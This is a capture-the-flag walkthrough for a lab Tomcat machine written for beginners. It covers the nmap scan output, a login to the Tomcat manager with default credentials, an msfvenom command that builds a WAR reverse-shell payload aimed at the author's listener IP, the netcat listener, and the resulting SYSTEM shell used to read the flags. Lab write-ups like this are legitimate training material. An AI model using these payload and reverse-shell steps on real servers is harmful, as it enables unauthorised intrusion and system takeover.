This was quite a straightforward and really easy web application. It provides the ability to practice the fundamentals of hacking which makes it just perfect for someone new to hacking.
We’re starting with a service scan to discover open ports, services and applications running in the background. So that we are aware of the infrastructure and possibly hidden services of interest that might let us disclose information or gain foothold.
$ nmap -A -p-65535 jerry Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-07 05:22 EDT Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 0.40% done Nmap scan report for jerry (10.10.10.95) Host is up (0.049s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache-Coyote Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2012|7|2008|2016|Vista (91%) OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops
We’re greeted by a tomcat index page.
Network mapper returns a possible redirection going on, so I thought to run the web application through a Burp proxy and got interesting findings from the response message.
<h3>Managing Tomcat</h3> <p>For security, access to the <a href="/manager/html">manager webapp</a> is restricted. Users are defined in </p> <pre> $CATALINA_HOME/conf/tomcat-users.xml </pre> <p>
Additionally, I ran a directory bruteforce to discover possibly hidden directories that could be used to our advantage.
By going to the discovered /manager directory, we are required to add credentials in order to authenticate. Upon clicking “cancel” button on firefox or chrome, we are redirected to a 401 page with default credentials as an example.
Typing the credentials into the authentication fields reveals default credential misconfiguration, and we are logged into the manager application.
In another hacking writeup, I remember exploiting the WAR file upload functionality to gain a shell. Herein, I am using “msfvenom” to create a file which when executed, will open a reverse shell connection to my netcat listener.
$ msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.6 LPORT=1234 -f war -o thebigslap.war 1 ⨯ Payload size: 13319 bytes Final size of war file: 13319 bytes Saved as: thebigslap.war
Open a netcat listener to catch the coming connection when after we deploy and open the war file.
$ nc -nvlp 1234 listening on [any] 1234 ...
Upload the war file, click deploy button. The file should appear among the directories in the application form of the main page. Click on it, to open the file and check netcat for incoming connections. And beneath I display that I have system privileges:
- “The system account and the administrator account (Administrators group) have the same file privileges, but they have different functions. The system account is used by the operating system and by services that run under Windows”
$ nc -nvlp 1234 listening on [any] 1234 ... connect to [10.10.14.6] from (UNKNOWN) [10.10.10.95] 49194 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88> C:\apache-tomcat-7.0.88>whoami whoami nt authority\system
C:\Users\Administrator\Desktop\flags>type * type * 2 for the price of 1.txt user.txt <FLAG:7004dbc...deleted> root.txt <FLAG:04a8b36...deleted>